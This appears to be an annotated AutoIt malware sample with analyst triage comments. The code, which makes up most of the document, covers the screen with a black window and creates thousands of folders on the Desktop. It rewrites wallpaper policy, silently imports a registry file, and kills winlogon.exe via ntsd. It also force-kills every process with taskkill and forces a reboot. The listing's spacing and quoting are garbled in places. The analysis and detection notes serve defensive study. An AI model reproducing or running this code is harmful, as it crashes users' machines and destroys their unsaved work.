GLOBAL CONST $CDDS_ITEMPREERASE = 65539

GLOBAL CONST $CDDS_ITEMPOSTERASE = 65540

GLOBAL CONST $CDDS_SUBITEM = 131072

GLOBAL CONST $CDIS_SELECTED = 1

GLOBAL CONST $CDIS_GRAYED = 2

GLOBAL CONST $CDIS_DISABLED = 4

GLOBAL CONST $CDIS_CHECKED = 8

GLOBAL CONST $CDIS_FOCUS = 16

GLOBAL CONST $CDIS_DEFAULT = 32

GLOBAL CONST $CDIS_HOT = 64

GLOBAL CONST $CDIS_MARKED = 128

GLOBAL CONST $CDIS_INDETERMINATE = 256

GLOBAL CONST $CDIS_SHOWKEYBOARDCUES = 512

GLOBAL CONST $CDIS_NEARHOT = 1024

GLOBAL CONST $CDIS_OTHERSIDEHOT = 2048

GLOBAL CONST $CDIS_DROPHILITED = 4096

GLOBAL CONST $CDRF_DODEFAULT = 0

GLOBAL CONST $CDRF_NEWFONT = 2

GLOBAL CONST $CDRF_SKIPDEFAULT = 4

GLOBAL CONST $CDRF_NOTIFYPOSTPAINT = 16

GLOBAL CONST $CDRF_NOTIFYITEMDRAW = 32

GLOBAL CONST $CDRF_NOTIFYSUBITEMDRAW = 32

GLOBAL CONST $CDRF_NOTIFYPOSTERASE = 64

GLOBAL CONST $CDRF_DOERASE = 8

GLOBAL CONST $CDRF_SKIPPOSTPAINT = 256

GLOBAL CONST $GUI_SS_DEFAULT_GUI = BITOR ($WS_MINIMIZEBOX, $WS_CAPTION, $WS_POPUP, $WS_SYSMENU)

; Analyst note: main body of the sample, annotated for triage.
; NOTE(review): spacing and quoting in this listing were altered by the page
; (e.g. "_ MAKEDIR", "@ DESKTOPWIDTH", "\ "); treat the strings as approximate.

; Stage 1 - pick three random, not-yet-existing file paths (see _MAKEDIR: 8-digit
; random name under @APPDATADIR) with .ico, .bmp and .reg extensions.
$ICO = _ MAKEDIR (".ico")

$BMP = _ MAKEDIR (".bmp")

$REG = _ MAKEDIR (".reg")

; Stage 2 - drop the three embedded "Are you OK.*" resources to those paths.
; The contents of the .reg file are not shown on the page.
FILEINSTALL ("Are you OK.ico", $ICO)

FILEINSTALL ("Are you OK.bmp", $BMP)

FILEINSTALL ("Are you OK.reg", $REG)

; Stage 3 - cover the desktop: an untitled popup window sized to the full desktop at 0,0,
; created with the tool-window extended style.
$FORM1 = GUICREATE ("", @ DESKTOPWIDTH, @ DESKTOPHEIGHT, 0,0, BITOR ($WS_SYSMENU, $WS_POPUP), BITOR ($WS_EX_TOOLWINDOW, $WS_EX_WINDOWEDGE))

; Cursor id 15 — presumably the "wait" cursor in AutoIt's cursor table; confirm.
GUISETCURSOR (15)

; Background colour 0 (black).
GUISETBKCOLOR (0)

GUISETSTATE (@ SW_SHOW)

; Stage 4 - resource consumption: _FORKDIR creates (width * height / 1000) decorated
; folders on the user's Desktop. Constructed example: 1920 x 1080 gives about 2073.
_ FORKDIR (@ DESKTOPDIR & "\", @ DESKTOPWIDTH * @ DESKTOPHEIGHT / 1000)

; Stage 5 - registry changes. Writes the dropped .bmp path to the per-user
; Policies\System "Wallpaper" value; a write to this value is a usable detection point.
REGWRITE ("HKEY_CURRENT_USER\ Software\ Microsoft\ Windows\ CurrentVersion\ Policies\ System\", "Wallpaper", "REG_SZ", $BMP)

; Runs regedit in silent mode on the dropped .reg with a hidden window.
; NOTE(review): the quoting on this line is garbled on the page; the working-directory
; argument has been folded into the command string.
RUNWAIT ("cmd.exe / c regedit / s"& $REG &", @ APPDATADIR &"\ ", @ SW_HIDE)

; Deletes the .reg after import, so the imported keys must be recovered from the
; sample's resources or from registry telemetry rather than from disk.
FILEDELETE ($REG)

; Stage 6 - system disruption. Only if ntsd.exe is present in the system directory:
; launches it hidden against winlogon.exe. NOTE(review): quoting is garbled; this reads
; as ntsd attaching by process name and issuing a quit command, which is consistent
; with the blue screen the article reports — confirm in a sandbox trace.
IF FILEEXISTS (@ SYSTEMDIR & "\ ntsd.exe") THEN

RUN ("cmd.exe / c" ntsd-c Q-pn winlogon.exe "", @ SYSTEMDIR & "\", @ SW_HIDE)

SLEEP (2333)

ENDIF

; Hidden taskkill with the force switch and the filter "pid ge 1", i.e. a filter that
; matches every process. A taskkill command line with this filter is a strong indicator.
RUN ("cmd.exe / c" taskkill / f / fi "pid ge 1", @ SYSTEMDIR & "\", @ SW_HIDE)

SLEEP (2333)

; Shutdown code 2 + 4 = 6: reboot combined with force in AutoIt's Shutdown flags.
SHUTDOWN (2 + 4)

; Analyst note: creates $NUM decorated folders directly under $DIRT.
;   $DIRT - parent directory (the caller passes the user's Desktop path)
;   $NUM  - number of folders to create
; Each iteration asks _MAKEDIR for an unused random name under $DIRT and hands the
; path to the folder-decorating routine called on the next line.
; No return value is set.
FUNC _ FORKDIR ($DIRT, $NUM)

FOR $I = 1 TO $NUM

; "\" as the suffix makes the generated path end in a backslash, i.e. a directory path.
$DIR = _ MAKEDIR ("\", $DIRT)

_ FUCKDIR ($DIR)

NEXT

ENDFUNC

; Analyst note: returns a path that does not exist yet; it creates nothing itself.
;   $FILE - suffix appended to the random name (an extension, or "\" for a directory)
;   $ROOT - parent directory; the string "null" is a sentinel meaning "use @APPDATADIR"
; Returns: $ROOT & <random 8-digit integer> & $FILE
; The 8-digit numeric name under %APPDATA% or the Desktop is a usable file-system
; hunting pattern for artefacts left by this sample.
FUNC _ MAKEDIR ($FILE = "\", $ROOT = "null")

IF $ROOT = "null" THEN

$ROOT = @ APPDATADIR & "\"

ENDIF

; Retry until the random candidate does not collide with an existing file or folder.
WHILE 1

; RANDOM(min, max, 1): the third argument requests an integer result.
$DIR = $ROOT & RANDOM (10000000, 99999999, 1) & $FILE

IF FILEEXISTS ($DIR) = FALSE THEN

EXITLOOP

ENDIF

WEND

RETURN $DIR

ENDFUNC

; Analyst note: creates one folder and decorates it through Desktop.ini.
;   $DIR - directory path to create (the caller passes a path ending in "\")
; Artefacts per folder: the directory itself, a Desktop.ini with a [.ShellClassInfo]
; section, and whatever the hidden cmd.exe call below creates.
FUNC _ FUCKDIR ($DIR)

DIRCREATE ($DIR)

; Hidden cmd.exe run with $DIR as working directory.
; NOTE(review): the command string is garbled on the page; it presumably creates a
; sub-folder named "Are you OK..." — confirm against the sample.
RUNWAIT ("cmd.exe / cmd" Are you OK...\ "", $DIR, @ SW_HIDE)

; Display name shown by Explorer for the folder.
INIWRITE ($DIR & "\ Desktop.ini", ".ShellClassInfo", "LocalizedResourceName", "Are you OK?")

; Folder icon points at the .ico dropped under @APPDATADIR by the main body.
INIWRITE ($DIR & "\ Desktop.ini", ".ShellClassInfo", "IconResource", $ICO)

; Tooltip text for the folder.
INIWRITE ($DIR & "\ Desktop.ini", ".ShellClassInfo", "InfoTip", "Are you OK?")

; Marks Desktop.ini hidden + system.
; NOTE(review): this path has no "\" before Desktop.ini, unlike the INIWRITE lines;
; it still resolves only because the caller's $DIR ends in a backslash — confirm.
FILESETATTRIB ($DIR & "Desktop.ini", "+ HS")

; Sets the system attribute on the folder itself.
FILESETATTRIB ($DIR, "+ S")

ENDFUNC

Harm:

After the sample runs, the system blue-screens, shuts down and restarts, and the sample keeps generating ini files and icons.
